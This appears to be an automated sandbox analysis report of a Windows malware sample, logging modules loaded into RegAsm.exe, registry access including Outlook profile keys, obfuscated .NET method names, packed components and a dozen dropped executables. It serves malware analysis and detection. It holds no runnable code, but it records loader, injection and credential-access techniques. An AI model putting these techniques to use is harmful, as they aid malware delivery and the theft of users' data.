Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: dwrite.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: msvcp140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: msasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: msisip.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wshext.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: appxsip.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: opcservices.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: esdsip.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: userenv.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: dpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: gpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sxs.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: scrrun.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: propsys.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: linkinfo.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: secur32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wbemcomn.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: amsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: rstrtmgr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ncrypt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ntasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: windowscodecs.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: rasapi32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: rasman.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: rtutils.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: winhttp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: iphlpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: dnsapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: winnsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: rasadhlp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: schannel.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: edputil.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: urlmon.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: iertutil.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: srvcli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: netutils.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wintypes.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: appresolver.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: bcp47langs.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: slc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sppc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: apphelp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: aclayers.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mpr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc_os.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wininet.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: rstrtmgr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ncrypt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ntasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: iertutil.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: winhttp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: iphlpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: winnsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: urlmon.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: srvcli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: netutils.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: dpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ntmarta.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mozglue.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wsock32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: vcruntime140.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: msvcp140.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: vcruntime140.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: propsys.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: edputil.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wintypes.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: appresolver.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: bcp47langs.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: slc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: userenv.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sppc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: pcacli.dll
Source: C:\Users\user\AppData\Local\Temp\is-9E297.tmp\PsIhedmEA44FNRssEU8V9OlH.tmp Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\is-9E297.tmp\PsIhedmEA44FNRssEU8V9OlH.tmp Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\is-9E297.tmp\PsIhedmEA44FNRssEU8V9OlH.tmp Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\is-9E297.tmp\PsIhedmEA44FNRssEU8V9OlH.tmp Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\is-9E297.tmp\PsIhedmEA44FNRssEU8V9OlH.tmp Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\is-9E297.tmp\PsIhedmEA44FNRssEU8V9OlH.tmp Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\is-9E297.tmp\PsIhedmEA44FNRssEU8V9OlH.tmp Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\is-9E297.tmp\PsIhedmEA44FNRssEU8V9OlH.tmp Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\is-9E297.tmp\PsIhedmEA44FNRssEU8V9OlH.tmp Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\is-9E297.tmp\PsIhedmEA44FNRssEU8V9OlH.tmp Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-9E297.tmp\PsIhedmEA44FNRssEU8V9OlH.tmp Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\is-9E297.tmp\PsIhedmEA44FNRssEU8V9OlH.tmp Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\is-9E297.tmp\PsIhedmEA44FNRssEU8V9OlH.tmp Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\is-9E297.tmp\PsIhedmEA44FNRssEU8V9OlH.tmp Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Local\Temp\is-9E297.tmp\PsIhedmEA44FNRssEU8V9OlH.tmp Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\is-9E297.tmp\PsIhedmEA44FNRssEU8V9OlH.tmp Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\is-9E297.tmp\PsIhedmEA44FNRssEU8V9OlH.tmp Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\is-9E297.tmp\PsIhedmEA44FNRssEU8V9OlH.tmp Section loaded: msacm32.dll
Source: C:\Users\user\AppData\Local\Temp\is-9E297.tmp\PsIhedmEA44FNRssEU8V9OlH.tmp Section loaded: winmmbase.dll
Source: C:\Users\user\AppData\Local\Temp\is-9E297.tmp\PsIhedmEA44FNRssEU8V9OlH.tmp Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\is-9E297.tmp\PsIhedmEA44FNRssEU8V9OlH.tmp Section loaded: riched20.dll
Source: C:\Users\user\AppData\Local\Temp\is-9E297.tmp\PsIhedmEA44FNRssEU8V9OlH.tmp Section loaded: usp10.dll
Source: C:\Users\user\AppData\Local\Temp\is-9E297.tmp\PsIhedmEA44FNRssEU8V9OlH.tmp Section loaded: msls31.dll
Source: C:\Users\user\AppData\Local\Temp\is-9E297.tmp\PsIhedmEA44FNRssEU8V9OlH.tmp Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\gobEmOm5sr.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
Source: C:\Users\user\AppData\Local\Temp\is-9E297.tmp\PsIhedmEA44FNRssEU8V9OlH.tmp Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwner
Source: C:\Users\user\AppData\Local\Temp\is-9E297.tmp\PsIhedmEA44FNRssEU8V9OlH.tmp Window found: window name: TMainForm
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\gobEmOm5sr.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
Source: C:\Users\user\AppData\Local\Temp\is-9E297.tmp\PsIhedmEA44FNRssEU8V9OlH.tmp Registry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\NewStar_is1
Source: gobEmOm5sr.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: gobEmOm5sr.exe Static PE information: Virtual size of .text is bigger than: 0x100000
Source: gobEmOm5sr.exe Static file information: File size 7097856 > 1048576
Source: gobEmOm5sr.exe Static PE information: Raw size of .text is bigger than: 0x100000 < 0x659a00
Source: gobEmOm5sr.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: gobEmOm5sr.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: \??\C:\Windows\symbols\exe\premium_gitrep.pdbe source: yh8OwfLgsaGOEy8sLU5UpJIK.exe, 00000008.00000002.2249226369.0000000001207000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: BitLockerToGo.pdb source: JJdIaooFQpkpcWNUCJ71mJDj.exe, 0000000A.00000002.2204897517.0000000001934000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: C:\Users\press\AppData\Local\Temp\Report.A66214F7-6635-4084-8609-050NK772Dll\obj\Debug\sXnMStC.pdbG source: REaoHTwA9AqN_cDvubi9mxZt.exe, 00000006.00000002.2332767463.00000000058C0000.00000004.08000000.00040000.00000000.sdmp, REaoHTwA9AqN_cDvubi9mxZt.exe, 00000006.00000002.2152537664.0000000003D79000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: newPrime_cloud.pdb source: 8LEi0YA5qqlYpHd7zimCU8lz.exe, 00000009.00000002.2225232174.000000000158E000.00000004.00000020.00020000.00000000.sdmp, 8LEi0YA5qqlYpHd7zimCU8lz.exe, 00000009.00000000.1923341342.0000000000BE2000.00000002.00000001.01000000.0000000B.sdmp
Source: Binary string: \??\C:\Users\user\Documents\iofolko5\8LEi0YA5qqlYpHd7zimCU8lz.PDBf1 source: 8LEi0YA5qqlYpHd7zimCU8lz.exe, 00000009.00000002.2225232174.0000000001556000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: n<C:\Windows\premium_gitrep.pdb source: yh8OwfLgsaGOEy8sLU5UpJIK.exe, 00000008.00000002.2233127778.0000000000F39000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: PE.pdb source: gobEmOm5sr.exe, 00000000.00000002.1663150655.0000000005790000.00000004.08000000.00040000.00000000.sdmp, REaoHTwA9AqN_cDvubi9mxZt.exe, 00000006.00000002.2152537664.0000000003D79000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: BitLockerToGo.pdbGCTL source: JJdIaooFQpkpcWNUCJ71mJDj.exe, 0000000A.00000002.2204897517.0000000001934000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: C:\Users\press\AppData\Local\Temp\Report.A66214F7-6635-4084-8609-050NK772Dll\obj\Debug\wMwlL.pdb source: gobEmOm5sr.exe, 00000000.00000002.1663531403.0000000005A90000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: premium_gitrep.pdb source: yh8OwfLgsaGOEy8sLU5UpJIK.exe, 00000008.00000000.1922223189.00000000007C2000.00000002.00000001.01000000.0000000A.sdmp, yh8OwfLgsaGOEy8sLU5UpJIK.exe, 00000008.00000002.2249226369.0000000001256000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\exe\newPrime_cloud.pdb source: 8LEi0YA5qqlYpHd7zimCU8lz.exe, 00000009.00000002.2225232174.000000000158E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\Documents\iofolko5\newPrime_cloud.pdb source: 8LEi0YA5qqlYpHd7zimCU8lz.exe, 00000009.00000002.2225232174.0000000001556000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\Documents\iofolko5\premium_gitrep.pdbFk<W source: yh8OwfLgsaGOEy8sLU5UpJIK.exe, 00000008.00000002.2249226369.0000000001207000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: 8LEi0YA5qqlYpHd7zimCU8lz.exe, 00000009.00000002.2225232174.000000000153D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: premium_gitrep.pdbx source: yh8OwfLgsaGOEy8sLU5UpJIK.exe, 00000008.00000000.1922223189.00000000007C2000.00000002.00000001.01000000.0000000A.sdmp, yh8OwfLgsaGOEy8sLU5UpJIK.exe, 00000008.00000002.2249226369.0000000001256000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: githubsoft.pdb source: gobEmOm5sr.exe, 00000000.00000000.1647082311.0000000000842000.00000002.00000001.01000000.00000003.sdmp
Source: Binary string: mscorlib.resources.pdbV source: yh8OwfLgsaGOEy8sLU5UpJIK.exe, 00000008.00000002.2249226369.0000000001207000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\mscorlib.pdb source: 8LEi0YA5qqlYpHd7zimCU8lz.exe, 00000009.00000002.2225232174.0000000001556000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: BotClient.pdb source: REaoHTwA9AqN_cDvubi9mxZt.exe, 00000006.00000000.1922131393.0000000000282000.00000002.00000001.01000000.00000008.sdmp
Source: Binary string: ud.pdbWindowsPowerShell\Modules;C:\Windows\system32\WindowsPowe source: 8LEi0YA5qqlYpHd7zimCU8lz.exe, 00000009.00000002.2225232174.000000000158E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: 0dows\symbols\dll\mscorlib.pdb source: yh8OwfLgsaGOEy8sLU5UpJIK.exe, 00000008.00000002.2249226369.00000000011F2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\Documents\iofolko5\newPrime_cloud.pdbN source: 8LEi0YA5qqlYpHd7zimCU8lz.exe, 00000009.00000002.2225232174.0000000001556000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\press\AppData\Local\Temp\Report.A66214F7-6635-4084-8609-050NK772Dll\obj\Debug\sXnMStC.pdb source: REaoHTwA9AqN_cDvubi9mxZt.exe, 00000006.00000002.2332767463.00000000058C0000.00000004.08000000.00040000.00000000.sdmp, REaoHTwA9AqN_cDvubi9mxZt.exe, 00000006.00000002.2152537664.0000000003D79000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: githubsoft.pdb8 source: gobEmOm5sr.exe, 00000000.00000000.1647082311.0000000000842000.00000002.00000001.01000000.00000003.sdmp
Source: Binary string: n<C:\Windows\newPrime_cloud.pdb source: 8LEi0YA5qqlYpHd7zimCU8lz.exe, 00000009.00000002.2221433328.00000000012F9000.00000004.00000010.00020000.00000000.sdmp

Data Obfuscation

Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Unpacked PE file: 17.2.lenTsqDIajevXTuJaJ03oKGb.exe.a60000.0.unpack :EW;.rsrc :W;.idata :W; :EW;lxojhmjk:EW;mdoopayt:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;lxojhmjk:EW;mdoopayt:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\NewStar\newstar.exe Unpacked PE file: 39.2.newstar.exe.400000.0.unpack .text:ER;.yhead8:R;.data:W;.rsrc:R;.zhead8:EW; vs .text:ER;.rdata:R;.data:W;.vmp0:ER;.rsrc:R;
Source: C:\Users\user\AppData\Local\NewStar\newstar.exe Unpacked PE file: 39.2.newstar.exe.400000.0.unpack
Source: 0.2.gobEmOm5sr.exe.5790000.5.raw.unpack, Ca01BQGh9DxiBOJwup.cs .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: gobEmOm5sr.exe Static PE information: 0xCFD7C7EE [Mon Jul 1 02:05:34 2080 UTC]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_00565A60 push ecx; ret 2_2_00565A73
Source: C:\Users\user\Documents\iofolko5\PsIhedmEA44FNRssEU8V9OlH.exe Code function: 7_2_004065C8 push 00406605h; ret 7_2_004065FD
Source: C:\Users\user\Documents\iofolko5\PsIhedmEA44FNRssEU8V9OlH.exe Code function: 7_2_004040B5 push eax; ret 7_2_004040F1
Source: C:\Users\user\Documents\iofolko5\PsIhedmEA44FNRssEU8V9OlH.exe Code function: 7_2_00408104 push ecx; mov dword ptr [esp], eax 7_2_00408109
Source: C:\Users\user\Documents\iofolko5\PsIhedmEA44FNRssEU8V9OlH.exe Code function: 7_2_00404185 push 00404391h; ret 7_2_00404389
Source: C:\Users\user\Documents\iofolko5\PsIhedmEA44FNRssEU8V9OlH.exe Code function: 7_2_00404206 push 00404391h; ret 7_2_00404389
Source: C:\Users\user\Documents\iofolko5\PsIhedmEA44FNRssEU8V9OlH.exe Code function: 7_2_0040C218 push eax; ret 7_2_0040C219
Source: C:\Users\user\Documents\iofolko5\PsIhedmEA44FNRssEU8V9OlH.exe Code function: 7_2_004042E8 push 00404391h; ret 7_2_00404389
Source: C:\Users\user\Documents\iofolko5\PsIhedmEA44FNRssEU8V9OlH.exe Code function: 7_2_00404283 push 00404391h; ret 7_2_00404389
Source: C:\Users\user\Documents\iofolko5\PsIhedmEA44FNRssEU8V9OlH.exe Code function: 7_2_00408F38 push 00408F6Bh; ret 7_2_00408F63
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Code function: 17_2_61EDA2A8 push ds; retf 17_2_61EDA2AE
Source: 0.2.gobEmOm5sr.exe.5790000.5.raw.unpack, KASIU9JAUDHSAHJDUHUDASUDUADAI0DKSFISJFUDHUFHHYU.cs High entropy of concatenated method names: 'OMFx84NSU3Aj89yeQCX', 'LAX01SNrXLuYFtkUKZE', 'iy9SsMNm29gB450FtMd', 'dBJrEtNGIa6qVBG9EBQ', 'rVg9gbNXhuTUCax3Faw', 'SqGmZ9Nwos9SN5Q7lkZ', 'GSe2iiNdiIejkDmaBS8', 'LqmMVpNxj2A5NG3wBxw', 'gYNBsNNfxAmxgoLk8AY', 'YxEaVbN7rCtxCfwOIGb'
Source: 0.2.gobEmOm5sr.exe.5790000.5.raw.unpack, psm102r62ZNKXfMgLP.cs High entropy of concatenated method names: 'OPSws322xfEh0', 'MODr39Nq5MiabxlX31k', 'iQoS09NJ2QNv2l3Nldp', 'CJQKDaN3RqE5Z376xIt', 'pj3HvaNg4CuSslIZxHe', 'aGob5JNuDhjrh89tMF7', 'OJrIsVNcKpdpxmnyCdy', 'nvy9T7NQKdlZSSpjdYZ', 'VWEEy8N4s3YgJEZssn2', 'hiS9r5NbbCsErEIxnl5'
Source: 0.2.gobEmOm5sr.exe.5790000.5.raw.unpack, Component1.cs High entropy of concatenated method names: 'Dispose', 'c2ZnNKXfM', 'KdItahZbaqrPOGXMMIH', 'F6Y0glZWI5sNge0KygR', 'oiohBeZubh6iBGSEkrx', 'eHnLj8Z41B6OG7M1JDy', 'N4gwHqZEFQ33Xh9XSL4', 'UsxTXAZipbL0y4O7ig6', 'lWEAf5ZlGZ9tBNchonB'
Source: 0.2.gobEmOm5sr.exe.5790000.5.raw.unpack, UserControl1.cs High entropy of concatenated method names: 'Dispose', 'F2igcbrUX', 'XHGgAUZzLmxCg9LHS8J', 'S8TWddN28E6t6e1W5DI', 'nxnywSZIvTRDeZkh3vn', 'Lg0nedZDohNDcCeYfhA', 'MCqqDaNZbmCaRq0a6S3', 'pte1vQNNcjSXyOcA1wm', 'FihZepNhpEadD2XS1mj', 'v4bBBrN14WWJwYVFB1v'
Source: 0.2.gobEmOm5sr.exe.5790000.5.raw.unpack, Hg0i8ysWBkmOQpOTDa.cs High entropy of concatenated method names: 'BBiryfpB2', 'KI0GlCWQr', 'nZK2JcQAs', 'lkTeKjlkc', 'RYq1Z9XkI', 'XOTf7va1f', 'Dispose', 'YAroKCCXX', 'acfjChBBkMo7PdIk7G', 'MFS1TWc0IT345kpNHi'
Source: 0.2.gobEmOm5sr.exe.5790000.5.raw.unpack, Ca01BQGh9DxiBOJwup.cs High entropy of concatenated method names: 'Qr5ud0NzY98AOC9xd95', 'G0Y0Wrh2oh1RhmJKSXb', 'X83AawNIkZucWFsrjDy', 'uZXqgXNDChJaWlp6NOY', 'ce4DmfsmSrOT856tDgfrkMb', 'qNiCQfbwXf', 'TgalQGhh96LsT9w8Qmj', 'Fw7QQNh18VntnfmGixE', 'ILFoXIhoc2Bm12rmWG4', 'AZNUskhyETNOaYTT1jk'

Persistence and Installation Behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\Documents\iofolko5\OvoRF_A3QBH3keQBtcOqN7Fa.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\Documents\iofolko5\wvASxpczH5zLyfxXnILhiH8_.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\Documents\iofolko5\PsIhedmEA44FNRssEU8V9OlH.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\Documents\iofolko5\2Umx78uafM0WA03fzJyYYhBa.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\Documents\iofolko5\8LEi0YA5qqlYpHd7zimCU8lz.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\Documents\iofolko5\1YtOZF0EeqgcR_ddwAXkTcuY.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\Documents\iofolko5\yh8OwfLgsaGOEy8sLU5UpJIK.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\Documents\iofolko5\7wpHB_IZvVwIDf0EgO_TfPH6.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\Documents\iofolko5\JJdIaooFQpkpcWNUCJ71mJDj.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\Documents\iofolko5\QUh1lM2wAJwuyCkYckhrDFwz.exe
